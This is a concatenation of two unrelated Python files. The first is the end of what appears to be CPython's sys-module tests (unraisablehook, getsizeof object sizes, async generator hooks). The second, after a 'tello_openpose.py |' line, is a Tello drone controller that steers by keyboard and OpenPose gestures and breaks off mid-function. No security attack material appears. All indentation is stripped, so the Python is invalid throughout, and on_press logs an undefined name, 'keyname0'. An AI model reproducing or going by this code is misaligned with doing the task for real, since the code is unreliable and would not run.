self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just classname, and the module names appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj");
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('6Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('6Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n4P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
def func():
return sys._getframe()
x = func()
check(x, size('3Pi3c7P2ic??2P'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2P4P4c7P2ic??P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn12PIP'
s = vsize('2P' + fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'6P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 64 + 42*calcsize("n2P"))
# dict with shared keys
[newstyleclass() for _ in range(100)]
check(newstyleclass().__dict__, size('nQ2P') + self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 64 + 42*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn3P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn3P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
tello_openpose.py | """
tello_openpose.py : Use the Tello drone as an "selfie air stick"
Relies on tellopy (for interaction with the Tello drone) and Openpose (for body detection and pose recognition)
I started from: https://github.com/Ubotica/telloCV/blob/master/telloCV.py
"""
import time
import datetime
import os
import tellopy
import numpy as np
import av
import cv2
from pynput import keyboard
import argparse
from math import pi, atan2
from OP import *
from math import atan2, degrees, sqrt
from simple_pid import PID
from multiprocessing import Process, Pipe, sharedctypes
from FPS import FPS
from CameraMorse import CameraMorse, RollingGraph
from SoundPlayer import SoundPlayer, Tone
import logging
import re
import sys
log = logging.getLogger("TellOpenpose")
def distance (A, B):
"""
Calculate the square of the distance between points A and B
"""
return int(sqrt((B[0]-A[0])**2 + (B[1]-A[1])**2))
def angle (A, B, C):
"""
Calculate the angle between segment(A,p2) and segment (p2,p3)
"""
if A is None or B is None or C is None:
return None
return degrees(atan2(C[1]-B[1],C[0]-B[0]) - atan2(A[1]-B[1],A[0]-B[0]))%360
def vertical_angle (A, B):
"""
Calculate the angle between segment(A,B) and vertical axe
"""
if A is None or B is None:
return None
return degrees(atan2(B[1]-A[1],B[0]-A[0]) - pi/2)
def quat_to_yaw_deg(qx,qy,qz,qw):
"""
Calculate yaw from quaternion
"""
degree = pi/180
sqy = qy*qy
sqz = qz*qz
siny = 2 * (qw*qz+qx*qy)
cosy = 1 - 2*(qy*qy+qz*qz)
yaw = int(atan2(siny,cosy)/degree)
return yaw
def openpose_worker():
"""
In 2 processes mode, this is the init and main loop of the child
"""
print("Worker process",os.getpid())
tello.drone.start_recv_thread()
tello.init_sounds()
tello.init_controls()
tello.op = OP(number_people_max=1, min_size=25, debug=tello.debug)
while True:
tello.fps.update()
frame = np.ctypeslib.as_array(tello.shared_array).copy()
frame.shape=tello.frame_shape
frame = tello.process_frame(frame)
cv2.imshow("Processed", frame)
tello.sound_player.play()
cv2.waitKey(1)
def main(use_multiprocessing=False, log_level=None):
"""
Create and run a tello controller :
1) get the video stream from the tello
2) wait for keyboard commands to pilot the tello
3) optionnally, process the video frames to track a body and pilot the tello accordingly.
If use_multiprocessing is True, the parent process creates a child process ('worker')
and the workload is shared between the 2 processes.
The parent process job is to:
- get the video stream from the tello and displays it in an OpenCV window,
- write each frame in shared memory at destination of the child,
each frame replacing the previous one (more efficient than a pipe or a queue),
- read potential command from the child (currently, only one command:EXIT).
Commands are transmitted by a Pipe.
The child process is responsible of all the others tasks:
- process the frames read in shared memory (openpose, write_hud),
- if enable, do the tracking (calculate drone commands from position of body),
- read keyboard commands,
- transmit commands (from tracking or from keyboard) to the tello, and receive message from the tello.
"""
global tello
if use_multiprocessing:
# Create the pipe for the communication between the 2 processes
parent_cnx, child_cnx = Pipe()
else:
child_cnx = None
tello = TelloController(use_face_tracking=True,
kbd_layout="AZERTY",
write_log_data=False,
log_level=log_level, child_cnx=child_cnx)
first_frame = True
frame_skip = 300
for frame in tello.container.decode(video=0):
if 0 < frame_skip:
frame_skip = frame_skip - 1
continue
start_time = time.time()
if frame.time_base < 1.0/60:
time_base = 1.0/60
else:
time_base = frame.time_base
# Convert frame to cv2 image
frame = cv2.cvtColor(np.array(frame.to_image(),dtype=np.uint8), cv2.COLOR_RGB2BGR)
frame = cv2.resize(frame, (640,480))
if use_multiprocessing:
if first_frame:
# Create the shared memory to share the current frame decoded by the parent process
# and given to the child process for further processing (openpose, write_hud,...)
frame_as_ctypes = np.ctypeslib.as_ctypes(frame)
tello.shared_array = sharedctypes.RawArray(frame_as_ctypes._type_, frame_as_ctypes)
tello.frame_shape = frame.shape
first_frame = False
# Launch process child
p_worker = Process(target=openpose_worker)
p_worker.start()
# Write the current frame in shared memory
tello.shared_array[:] = np.ctypeslib.as_ctypes(frame.copy())
# Check if there is some message from the child
if parent_cnx.poll():
msg = parent_cnx.recv()
if msg == "EXIT":
print("MAIN EXIT")
p_worker.join()
tello.drone.quit()
cv2.destroyAllWindows()
exit(0)
else:
frame = tello.process_frame(frame)
tello.sound_player.play()
if not use_multiprocessing: tello.fps.update()
# Display the frame
cv2.imshow('Tello', frame)
cv2.waitKey(1)
frame_skip = int((time.time() - start_time)/time_base)
class TelloController(object):
"""
TelloController builds keyboard controls on top of TelloPy as well
as generating images from the video stream and enabling opencv support
"""
def __init__(self, use_face_tracking=True,
kbd_layout="QWERTY",
write_log_data=False,
media_directory="media",
child_cnx=None,
log_level=None):
self.log_level = log_level
self.debug = log_level is not None
self.child_cnx = child_cnx
self.use_multiprocessing = child_cnx is not None
self.kbd_layout = kbd_layout
# Flight data
self.is_flying = False
self.battery = None
self.fly_mode = None
self.throw_fly_timer = 0
self.tracking_after_takeoff = False
self.record = False
self.keydown = False
self.date_fmt = '%Y-%m-%d_%H%M%S'
self.drone = tellopy.Tello(start_recv_thread=not self.use_multiprocessing)
self.axis_command = {
"yaw": self.drone.clockwise,
"roll": self.drone.right,
"pitch": self.drone.forward,
"throttle": self.drone.up
}
self.axis_speed = { "yaw":0, "roll":0, "pitch":0, "throttle":0}
self.cmd_axis_speed = { "yaw":0, "roll":0, "pitch":0, "throttle":0}
self.prev_axis_speed = self.axis_speed.copy()
self.def_speed = { "yaw":50, "roll":35, "pitch":35, "throttle":80}
self.write_log_data = write_log_data
self.reset()
self.media_directory = media_directory
if not os.path.isdir(self.media_directory):
os.makedirs(self.media_directory)
if self.write_log_data:
path = 'tello-%s.csv' % datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')
self.log_file = open(path, 'w')
self.write_header = True
self.init_drone()
if not self.use_multiprocessing:
self.init_sounds()
self.init_controls()
# container for processing the packets into frames
self.container = av.open(self.drone.get_video_stream())
self.vid_stream = self.container.streams.video[0]
self.out_file = None
self.out_stream = None
self.out_name = None
self.start_time = time.time()
# Setup Openpose
if not self.use_multiprocessing:
self.op = OP(number_people_max=1, min_size=25, debug=self.debug)
self.use_openpose = False
self.morse = CameraMorse(display=False)
self.morse.define_command("---", self.delayed_takeoff)
self.morse.define_command("...", self.throw_and_go, {'tracking':True})
self.is_pressed = False
self.fps = FPS()
self.exposure = 0
if self.debug:
self.graph_pid = RollingGraph(window_name="PID", step_width=2, width=2000, height=500, y_max=200, colors=[(255,255,255),(255,200,0),(0,0,255),(0,255,0)],thickness=[2,2,2,2],threshold=100, waitKey=False)
# Logging
self.log_level = log_level
if log_level is not None:
if log_level == "info":
log_level = logging.INFO
elif log_level == "debug":
log_level = logging.DEBUG
log.setLevel(log_level)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(log_level)
ch.setFormatter(logging.Formatter(fmt='%(asctime)s.%(msecs)03d - %(name)s - %(levelname)s - %(message)s',
datefmt="%H:%M:%S"))
log.addHandler(ch)
def set_video_encoder_rate(self, rate):
self.drone.set_video_encoder_rate(rate)
self.video_encoder_rate = rate
def reset (self):
"""
Reset global variables before a fly
"""
log.debug("RESET")
self.ref_pos_x = -1
self.ref_pos_y = -1
self.ref_pos_z = -1
self.pos_x = -1
self.pos_y = -1
self.pos_z = -1
self.yaw = 0
self.tracking = False
self.keep_distance = None
self.palm_landing = False
self.palm_landing_approach = False
self.yaw_to_consume = 0
self.timestamp_keep_distance = time.time()
self.wait_before_tracking = None
self.timestamp_take_picture = None
self.throw_ongoing = False
self.scheduled_takeoff = None
# When in trackin mode, but no body is detected in current frame,
# we make the drone rotate in the hope to find some body
# The rotation is done in the same direction as the last rotation done
self.body_in_prev_frame = False
self.timestamp_no_body = time.time()
self.last_rotation_is_cw = True
def init_drone(self):
"""
Connect to the drone, start streaming and subscribe to events
"""
if self.log_level :
self.drone.log.set_level(2)
self.drone.connect()
self.set_video_encoder_rate(2)
self.drone.start_video()
self.drone.subscribe(self.drone.EVENT_FLIGHT_DATA,
self.flight_data_handler)
self.drone.subscribe(self.drone.EVENT_LOG_DATA,
self.log_data_handler)
self.drone.subscribe(self.drone.EVENT_FILE_RECEIVED,
self.handle_flight_received)
def init_sounds(self):
self.sound_player = SoundPlayer(debug=self.debug)
self.sound_player.load("approaching", "sounds/approaching.ogg")
self.sound_player.load("keeping distance", "sounds/keeping_distance.ogg")
self.sound_player.load("landing", "sounds/landing.ogg")
self.sound_player.load("palm landing", "sounds/palm_landing.ogg")
self.sound_player.load("taking picture", "sounds/taking_picture.ogg")
self.sound_player.load("free", "sounds/free.ogg")
self.tone = Tone()
def on_press(self, keyname):
"""
Handler for keyboard listener
"""
if self.keydown:
return
try:
self.keydown = True
keyname = str(keyname).strip('\'')
log.info('KEY PRESS ' + keyname)
if keyname == 'Key.esc':
self.toggle_tracking(False)
# self.tracking = False
self.drone.land()
self.drone.quit()
if self.child_cnx:
# Tell to the parent process that it's time to exit
self.child_cnx.send("EXIT")
cv2.destroyAllWindows()
os._exit(0)
if keyname in self.controls_keypress:
self.controls_keypress[keyname]()
except AttributeError:
log.debug(f'special key {keyname0} pressed')
def on_release(self, keyname):
"""
Reset on key up from keyboard listener
"""
self.keydown = False
keyname = str(keyname).strip('\'')
log.info('KEY RELEASE ' + keyname)
if keyname in self.controls_keyrelease:
key_handler = self.controls_keyrelease[keyname]()
def set_speed(self, axis, speed):
log.info(f"set speed {axis} {speed}")
self.cmd_axis_speed[axis] = speed
def init_controls(self):
"""
Define keys and add listener
"""
controls_keypress_QWERTY = {
'w': lambda: self.set_speed("pitch", self.def_speed["pitch"]),
's': lambda: self.set_speed("pitch", -self.def_speed["pitch"]),
'a': lambda: self.set_speed("roll", -self.def_speed["roll"]),
'd': lambda: self.set_speed("roll", self.def_speed["roll"]),
'q': lambda: self.set_speed("yaw", -self.def_speed["yaw"]),
'e': lambda: self.set_speed("yaw", self.def_speed["yaw"]),
'i': lambda: self.drone.flip_forward(),
'k': lambda: self.drone.flip_back(),
'j': lambda: self.drone.flip_left(),
'l': lambda: self.drone.flip_right(),
'Key.left': lambda: self.set_speed("yaw", -1.5*self.def_speed["yaw"]),
'Key.right': lambda: self.set_speed("yaw", 1.5*self.def_speed["yaw"]),
'Key.up': lambda: self.set_speed("throttle", self.def_speed["throttle"]),
'Key.down': lambda: self.set_speed("throttle", -self.def_speed["throttle"]),
'Key.tab': lambda: self.drone.takeoff(),
'Key.backspace': lambda: self.drone.land(),
'p': lambda: self.palm_land(),
't': lambda: self.toggle_tracking(),
'o': lambda: self.toggle_openpose(),
'Key.enter': lambda: self.take_picture(),
'c': lambda: self.clockwise_degrees(360),
'0': lambda: self.drone.set_video_encoder_rate(0),
'1': lambda: self.drone.set_video_encoder_rate(1),
'2': lambda: self.drone.set_video_encoder_rate(2),
'3': lambda: self.drone.set_video_encoder_rate(3),
'4': lambda: self.drone.set_video_encoder_rate(4),
'5': lambda: self.drone.set_video_encoder_rate(5),
'7': lambda: self.set_exposure(-1),
'8': lambda: self.set_exposure(0),
'9': lambda: self.set_exposure(1)
}
controls_keyrelease_QWERTY = {
'w': lambda: self.set_speed("pitch", 0),
's': lambda: self.set_speed("pitch", 0),
'a': lambda: self.set_speed("roll", 0),
'd': lambda: self.set_speed("roll", 0),
'q': lambda: self.set_speed("yaw", 0),
'e': lambda: self.set_speed("yaw", 0),
'Key.left': lambda: self.set_speed("yaw", 0),
'Key.right': lambda: self.set_speed("yaw", 0),
'Key.up': lambda: self.set_speed("throttle", 0),
'Key.down': lambda: self.set_speed("throttle", 0)
}
controls_keypress_AZERTY = {
'z': lambda: self.set_speed("pitch", self.def_speed["pitch"]),
's': lambda: self.set_speed("pitch", -self.def_speed["pitch"]),
'q': lambda: self.set_speed("roll", -self.def_speed["roll"]),
'd': lambda: self.set_speed("roll", self.def_speed["roll"]),
'a': lambda: self.set_speed("yaw", -self.def_speed["yaw"]),
'e': lambda: self.set_speed("yaw", self.def_speed["yaw"]),
'i': lambda: self.drone.flip_forward(),
'k': lambda: self.drone.flip_back(),
'j': lambda: self.drone.flip_left(),
'l': lambda: self.drone.flip_right(),
'Key.left': lambda: self.set_speed("yaw", -1.5*self.def_speed["yaw"]),
'Key.right': lambda: self.set_speed("yaw", 1.5*self.def_speed["yaw"]),
'Key.up': lambda: self.set_speed("throttle", self.def_speed["throttle"]),
'Key.down': lambda: self.set_speed("throttle", -self.def_speed["throttle"]),
'Key.tab': lambda: self.drone.takeoff(),
'Key.backspace': lambda: self.drone.land(),
'p': lambda: self.palm_land(),
't': lambda: self.toggle_tracking(),
'o': lambda: self.toggle_openpose(),
'Key.enter': lambda: self.take_picture(),
'c': lambda: self.clockwise_degrees(360),
'0': lambda: self.drone.set_video_encoder_rate(0),
'1': lambda: self.drone.set_video_encoder_rate(1),
'2': lambda: self.drone.set_video_encoder_rate(2),
'3': lambda: self.drone.set_video_encoder_rate(3),
'4': lambda: self.drone.set_video_encoder_rate(4),
'5': lambda: self.drone.set_video_encoder_rate(5),
'7': lambda: self.set_exposure(-1),
'8': lambda: self.set_exposure(0),
'9': lambda: self.set_exposure(1)
}
controls_keyrelease_AZERTY = {
'z': lambda: self.set_speed("pitch", 0),
's': lambda: self.set_speed("pitch", 0),
'q': lambda: self.set_speed("roll", 0),
'd': lambda: self.set_speed("roll", 0),
'a': lambda: self.set_speed("yaw", 0),
'e': lambda: self.set_speed("yaw", 0),
'Key.left': lambda: self.set_speed("yaw", 0),
'Key.right': lambda: self.set_speed("yaw", 0),
'Key.up': lambda: self.set_speed("throttle", 0),
'Key.down': lambda: self.set_speed("throttle", 0)
}
if self.kbd_layout == "AZERTY":
self.controls_keypress = controls_keypress_AZERTY
self.controls_keyrelease = controls_keyrelease_AZERTY
else:
self.controls_keypress = controls_keypress_QWERTY
self.controls_keyrelease = controls_keyrelease_QWERTY
self.key_listener = keyboard.Listener(on_press=self.on_press,
on_release=self.on_release)
self.key_listener.start()
def check_pose(self, w, h):
"""
Check if we detect a pose in the body detected by Openpose
"""
neck = self.op.get_body_kp("Neck")
r_wrist = self.op.get_body_kp("RWrist")
l_wrist = self.op.get_body_kp("LWrist")
r_elbow = self.op.get_body_kp("RElbow")
l_elbow = self.op.get_body_kp("LElbow")
r_shoulder = self.op.get_body_kp("RShoulder")
l_shoulder = self.op.get_body_kp("LShoulder")
r_ear = self.op.get_body_kp("REar")
l_ear = self.op.get_body_kp("LEar")
self.shoulders_width = distance(r_shoulder,l_shoulder) if r_shoulder and l_shoulder else None
vert_angle_right_arm = vertical_angle(r_wrist, r_elbow)
vert_angle_left_arm = vertical_angle(l_wrist, l_elbow)
left_hand_up = neck and l_wrist and l_wrist[1] < neck[1]
right_hand_up = neck and r_wrist and r_wrist[1] < neck[1]
if right_hand_up:
if not left_hand_up:
# Only right arm up
if r_ear and (r_ear[0]-neck[0])*(r_wrist[0]-neck[0])>0:
# Right ear and right hand on the same side
if vert_angle_right_arm:
if vert_angle_right_arm < -15:
return "RIGHT_ARM_UP_OPEN"
if 15 < vert_angle_right_arm < 90:
return "RIGHT_ARM_UP_CLOSED"
elif l_ear and self.shoulders_width and distance(r_wrist,l_ear) < self.shoulders_width/4:
# Right hand close to left ear
return "RIGHT_HAND_ON_LEFT_EAR"
else:
# Both hands up
# Check if both hands are on the ears
if r_ear and l_ear:
ear_dist = distance(r_ear,l_ear)
if distance(r_wrist,r_ear)<ear_dist/3 and distance(l_wrist,l_ear)<ear_dist/3:
return("HANDS_ON_EARS")
# Check if boths hands are closed to each other and above ears
# (check right hand is above right ear is enough since hands are closed to each other)
if self.shoulders_width and r_ear:
near_dist = self.shoulders_width/3
if r_ear[1] > r_wrist[1] and distance(r_wrist, l_wrist) < near_dist :
